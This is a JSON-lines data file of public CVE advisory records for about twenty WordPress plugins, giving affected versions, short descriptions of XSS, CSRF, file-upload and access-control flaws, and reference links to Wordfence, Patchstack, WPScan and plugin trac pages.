{"CVE_ID":"CVE-2023-2170","slug":"simple-tags","versionImpact":"3.6.4","description":"The TaxoPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Related Posts functionality in versions up to, and including, 3.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with Editor+ permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2868795%40simple-tags%2Ftrunk&old=2774153%40simple-tags%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2868795%40simple-tags%2Ftrunk&old=2774153%40simple-tags%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-tags\\\/trunk\\\/inc\\\/related-posts-functions.php?rev=2674563#L155\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-tags\\\/trunk\\\/inc\\\/related-posts-functions.php?rev=2674563#L155\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e98ed932-4e4c-4127-ae72-500e2a34f371?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e98ed932-4e4c-4127-ae72-500e2a34f371?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4396","slug":"rucy","versionImpact":"0.4.4","description":"The Rucy plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 0.4.4. This is due to missing or incorrect nonce validation on the save_rc_post_meta() function. This makes it possible for unauthenticated attackers to save post meta via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rucy\\\/trunk\\\/inc\\\/class-rucy-editor.php#L237\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rucy\\\/trunk\\\/inc\\\/class-rucy-editor.php#L237\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/595d0401-55b9-418e-8b99-48b23e9a2662?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/595d0401-55b9-418e-8b99-48b23e9a2662?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6661","slug":"paritypress","versionImpact":"1.0.0","description":"The ParityPress \u2013 Parity Pricing with Discount Rules plugin for WordPress is vulnerable to Stored Cross-Site Scripting via  'Discount Text' in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f015ff9b-a7dc-47de-83d4-d6b91ec433f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f015ff9b-a7dc-47de-83d4-d6b91ec433f7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/paritypress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/paritypress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paritypress\\\/trunk\\\/app\\\/Hooks\\\/Activator.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paritypress\\\/trunk\\\/app\\\/Hooks\\\/Activator.php#L22\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-43257","slug":"leopard-wordpress-offload-media","versionImpact":"2.0.36","description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Nouthemes Leopard - WordPress offload media.This issue affects Leopard - WordPress offload media: from n\/a through 2.0.36.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/leopard-wordpress-offload-media\\\/wordpress-leopard-wordpress-offload-media-plugin-2-0-36-subscriber-sensitive-data-exposure-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/leopard-wordpress-offload-media\\\/wordpress-leopard-wordpress-offload-media-plugin-2-0-36-subscriber-sensitive-data-exposure-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12437","slug":"marketplace-items","versionImpact":"1.5.5","description":"The Marketplace Items plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'envato' shortcode in all versions up to, and including, 1.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/marketplace-items\\\/trunk\\\/marketplace-items.php#L94\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/marketplace-items\\\/trunk\\\/marketplace-items.php#L94\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/marketplace-items\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/marketplace-items\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e055c319-1aeb-4a97-98d1-3b38e61f30f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e055c319-1aeb-4a97-98d1-3b38e61f30f0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2077","slug":"simple-amazon-affiliate","versionImpact":"1.0.9","description":"The Simple Amazon Affiliate plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'msg' parameter in all versions up to, and including, 1.0.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-amazon-affiliate\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-amazon-affiliate\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecd48e2c-343f-4bae-9d9e-260d003ef87c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecd48e2c-343f-4bae-9d9e-260d003ef87c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31846","slug":"theatre","versionImpact":"0.18.7","description":"Missing Authorization vulnerability in Jeroen Schmit Theater for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Theater for WordPress: from n\/a through 0.18.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/theatre\\\/vulnerability\\\/wordpress-theater-for-wordpress-plugin-0-18-7-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/theatre\\\/vulnerability\\\/wordpress-theater-for-wordpress-plugin-0-18-7-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12732","slug":"affiliateimportereb","versionImpact":"1.0.6","description":"The AffiliateImporterEb WordPress plugin through 1.0.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bc46edd8-8d77-4567-873b-e9e90a01adcf\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bc46edd8-8d77-4567-873b-e9e90a01adcf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6057","slug":"wpbookit","versionImpact":"1.0.4","description":"The WPBookit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the handle_image_upload() function in all versions up to, and including, 1.0.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbookit\\\/trunk\\\/core\\\/admin\\\/classes\\\/controllers\\\/class.wpb-profile-controller.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbookit\\\/trunk\\\/core\\\/admin\\\/classes\\\/controllers\\\/class.wpb-profile-controller.php#L85\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3326098%40wpbookit&new=3326098%40wpbookit&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3326098%40wpbookit&new=3326098%40wpbookit&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpbookit\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpbookit\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fac81cc0-c6c9-4009-aacb-52adc70c0261?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fac81cc0-c6c9-4009-aacb-52adc70c0261?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2169","slug":"simple-tags","versionImpact":"3.6.4","description":"The TaxoPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Related Posts functionality in versions up to, and including, 3.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with Editor+ permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2868795%40simple-tags%2Ftrunk&old=2774153%40simple-tags%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2868795%40simple-tags%2Ftrunk&old=2774153%40simple-tags%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-tags\\\/trunk\\\/inc\\\/related-posts-functions.php?rev=2674563#L156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-tags\\\/trunk\\\/inc\\\/related-posts-functions.php?rev=2674563#L156\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52574d99-1ffe-4152-bf13-9cdd11d7300a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52574d99-1ffe-4152-bf13-9cdd11d7300a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4357","slug":"ulisting","versionImpact":"1.6.6.","description":"The uListing plugin for WordPress is vulnerable to authorization bypass due to missing capability checks, and a missing security nonce, on the UlistingUserRole::save_role_api function in versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to arbitrarily delete site posts and pages.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71aa14b8-39bc-4b91-a7cf-9d203fdf44ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71aa14b8-39bc-4b91-a7cf-9d203fdf44ea?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ulisting\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ulisting\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4395","slug":"woo-abandoned-cart-recovery","versionImpact":"1.0.4","description":"The Abandoned Cart Recovery for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.4. This is due to missing or incorrect nonce validation on the get_items() and extra_tablenav() functions. This makes it possible for unauthenticated attackers to perform read-only actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45b627f9-e7c6-4bf6-b1c7-d607f3e083f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45b627f9-e7c6-4bf6-b1c7-d607f3e083f8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2550169%40woo-abandoned-cart-recovery&new=2550169%40woo-abandoned-cart-recovery&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2550169%40woo-abandoned-cart-recovery&new=2550169%40woo-abandoned-cart-recovery&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1986","slug":"woocommerce-jetpack","versionImpact":"7.1.7","description":"The Booster Elite for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the wc_add_new_product() function in all versions up to, and including, 7.1.7. This makes it possible for customer-level attackers, and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. This is only exploitable when the user product upload functionality is enabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9c2fb7f-a05b-4852-97eb-7befe880d703?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9c2fb7f-a05b-4852-97eb-7befe880d703?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/shortcodes\\\/class-wcj-products-add-form-shortcodes.php#L322\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/shortcodes\\\/class-wcj-products-add-form-shortcodes.php#L322\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/shortcodes\\\/class-wcj-products-add-form-shortcodes.php#L333\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/shortcodes\\\/class-wcj-products-add-form-shortcodes.php#L333\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/shortcodes\\\/class-wcj-products-add-form-shortcodes.php#L132\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/shortcodes\\\/class-wcj-products-add-form-shortcodes.php#L132\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/shortcodes\\\/class-wcj-products-add-form-shortcodes.php#L138\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/shortcodes\\\/class-wcj-products-add-form-shortcodes.php#L138\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/booster.io\\\/\",\"name\":\"https:\\\/\\\/booster.io\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-jetpack\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-jetpack\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6634","slug":"mastercurrency-wp","versionImpact":"1.1.61","description":"The Master Currency WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's currencyconverterform shortcode in all versions up to, and including, 1.1.61 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fea71287-f92e-43e5-adbf-d89fce437e56?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fea71287-f92e-43e5-adbf-d89fce437e56?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mastercurrency-wp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mastercurrency-wp\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7617","slug":"contact-form-to-any-api","versionImpact":"1.2.2","description":"The Contact Form to Any API plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Contact Form 7 form fields in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39487908-5cc5-42ac-8af4-65626694b1e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39487908-5cc5-42ac-8af4-65626694b1e4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-to-any-api\\\/trunk\\\/admin\\\/partials\\\/cf7-to-any-api-admin-entries.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-to-any-api\\\/trunk\\\/admin\\\/partials\\\/cf7-to-any-api-admin-entries.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10223","slug":"ht-team-member","versionImpact":"1.1.4","description":"The WP Team \u2013 WordPress Team Member Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's htteamember shortcode in all versions up to, and including, 1.1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f5a8f5b-d67c-4c08-9f2d-1f743ffdae81?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f5a8f5b-d67c-4c08-9f2d-1f743ffdae81?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ht-team-member\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ht-team-member\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3177675\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3177675\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2076","slug":"binlayerpress","versionImpact":"1.1","description":"The binlayerpress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/binlayerpress\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/binlayerpress\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af920a9-15fb-44c9-be31-7c9ed5bc2031?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af920a9-15fb-44c9-be31-7c9ed5bc2031?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31843","slug":"openai-tools-for-wp-wc","versionImpact":"2.1.5","description":"Missing Authorization vulnerability in Wilson OpenAI Tools for WordPress & WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects OpenAI Tools for WordPress & WooCommerce: from n\/a through 2.1.5.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/openai-tools-for-wp-wc\\\/vulnerability\\\/wordpress-openai-tools-for-wordpress-woocommerce-plugin-2-1-5-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/openai-tools-for-wp-wc\\\/vulnerability\\\/wordpress-openai-tools-for-wordpress-woocommerce-plugin-2-1-5-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12726","slug":"clipart","versionImpact":"0.2","description":"The ClipArt WordPress plugin through 0.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88d748fc-6c2f-4656-99c5-c00cbed9d7e0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88d748fc-6c2f-4656-99c5-c00cbed9d7e0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
